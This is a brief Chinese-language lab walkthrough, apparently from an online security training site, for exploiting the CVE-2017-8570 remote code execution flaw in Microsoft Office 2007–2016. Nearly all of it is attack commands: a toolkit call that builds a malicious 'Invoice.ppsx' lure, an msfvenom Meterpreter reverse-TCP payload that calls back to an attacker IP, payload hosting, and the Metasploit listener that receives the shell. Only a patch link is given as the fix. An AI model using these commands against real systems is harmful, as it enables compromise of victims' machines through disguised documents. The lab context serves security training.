-
-
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2013 RT Service Pack 1
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
-
Office远程代码执行漏洞_网络安全在线实验_i春秋 (ichunqiu.com)
1.生成ppsx文件cd CVE-2017-8570 //进入exploit的目录
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://172.16.12.2/logo.doc //生成ppsx恶意文件
2.生成反弹文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe3.监听端口
python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe
4.msf本地监听反弹
msfconsole
use multi/handler //使用监听模块
set payload windows/meterpreter/reverse_tcp //设置Payload
set LHOST 172.16.12.2 //设置本地接收IP
run
5.打开ppsx文件,获得shell,
修复方案,
补丁地址 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570